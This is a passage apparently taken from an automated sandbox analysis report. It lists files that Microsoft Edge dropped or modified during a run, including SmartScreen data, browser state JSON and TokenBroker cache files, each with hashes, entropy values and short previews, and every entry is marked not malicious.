rj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF50a58.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.08976990039127
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMWkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn15kzItSmd6qE7lFoC
MD5:	A9C670F3E70FE9EEACE55DA5EA7E1499
SHA1:	E23F7EA6021DD93F7EEB009C6CC26F67B8C93023
SHA-256:	BD3F4BB700E3836A21A841B550F7DEE85E5DFAEA5E7A450088C9ED81496BB8EF
SHA-512:	DE58E7275B9A35353D294C78EDC51E88E3F5E22BF145F9C6885A2409793C46BA5D85571552EA60A624F1F942F03F617C19F24328C5ACCE3202E71695CF0A2E81
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.993191109396916
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXcBMi:YWLSGTt1o9LuLgfGBPAzkVj/T8lq
MD5:	35CA323996335C28A26B6BC876F413A8
SHA1:	A5B8B6E220DA4B0415640AF2C7E5BCAA01124ED7
SHA-256:	19EC5AA5BCA0249D06A15B092265682EBE280E4BCE30722DEF8CAB03F370230A
SHA-512:	11BD5840346BF99F42EE2ED75358BA8AB140185CCC26D44866B4E091BB3B6CAC58BBF09D4C1D6269D921D389B74E4B5F859D7D0B92A3CB95C6881AFC39857B3D
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732442977214712}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
MD5:	F732DBED9289177D15E236D0F8F2DDD3
SHA1:	53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
SHA-256:	2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
SHA-512:	B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a265ff14-3c46-4da4-9053-4ea2b4bd1fa3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44898
Entropy (8bit):	6.094858904834839
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWgZi1zNts5rEeNCqqZsPElKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynDYeIKtSmd6qE7lFoC
MD5:	1A2BF50A2F468F8B2FB8631B38E02943
SHA1:	55D204ACE6322474209CE25B34713953168A2731
SHA-256:	FF6EA06AAA3F3FC45242EB89DF069AD7CD7C3AB5F295058D52ED5D4D038B6D08
SHA-512:	5F552FECD4BD4E824F5887220A0D3B511A3A2193187E254DA8CDFF1B5203F2BF3BB633D1AFB5F465AF89834194A3D3F34F37AFCC1CD63E2EC4A89DAE75DFC76F
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d7e0a9be-630d-49a8-9fd9-93d67fccedfa.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44898
Entropy (8bit):	6.094858904834839
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWgZi1zNts5rEeNCqqZsPElKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynDYeIKtSmd6qE7lFoC
MD5:	1A2BF50A2F468F8B2FB8631B38E02943
SHA1:	55D204ACE6322474209CE25B34713953168A2731
SHA-256:	FF6EA06AAA3F3FC45242EB89DF069AD7CD7C3AB5F295058D52ED5D4D038B6D08
SHA-512:	5F552FECD4BD4E824F5887220A0D3B511A3A2193187E254DA8CDFF1B5203F2BF3BB633D1AFB5F465AF89834194A3D3F34F37AFCC1CD63E2EC4A89DAE75DFC76F
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.847478780119735
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxcxl9Il8udlWM8FLqAEfxlyCrsVqSod1rc:mxY7lWM+qhZtrsN/
MD5:	C6FAE8262CC276AA57A96B4C5B07DA0F
SHA1:	33D3356C909E6BC3CED02A919719DA2C73774889
SHA-256:	8A98B0C71C2EFEF6B09E2E083915D4CF5D27C35DC96BE0036D20AE6E2BCDC3B3
SHA-512:	2C75CCC56AB17463C54F016D6C416678B92A605839524AA6682B5876512886F6788001B1928599EBE54379D8F86E7E5E7760672B1563FFF1AA5DACF61EEE67D2
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.H.h.P.p.3.Y.9.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4./.d.f.o.L.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	3.9989204540779117
Encrypted:	false
SSDEEP:	96:hYbjP+cfhN9ljw9bOUumZ6gL5q2RdNwa0/cU:hkjWUh1jIbOUqU57RdNVMt
MD5:	55DA2CB91D7918BC0C513C3E72740E1C
SHA1:	5E88A25AFCC432E8F90631661A534D6E0F91FE30
SHA-256:	C7B5E6B83C825D255D90DEB168502FF68608FDB069EF2F283C11C099905232BD
SHA-512:	9342F10B33CD0F7CC9407C2DAB81FD135CA3A2F47B4462B436139C08506DC3D42B779C6B3CFCEC0D8130158BF09B254510C49AAA518ADC5C2CF06D45E70075BF
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".a.s.I.H.j.W.4.9.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4./.d.f.o.L.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.9067796635937153
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7xafxl9Il8u1BN3aHBG2/plm0l0Uf7Dvd/vc:aIYTDaHwWlm0tvq
MD5:	B06657CE3DB1DC18989500718D92374D
SHA1:	A595C4DB6B5851B46D941F9AC300D81760A8B2A8
SHA-256:	60772775CF6B1F1C29A95FE1D72CA7CB0A391BF390C94235F42C1D4A8A9D3F77
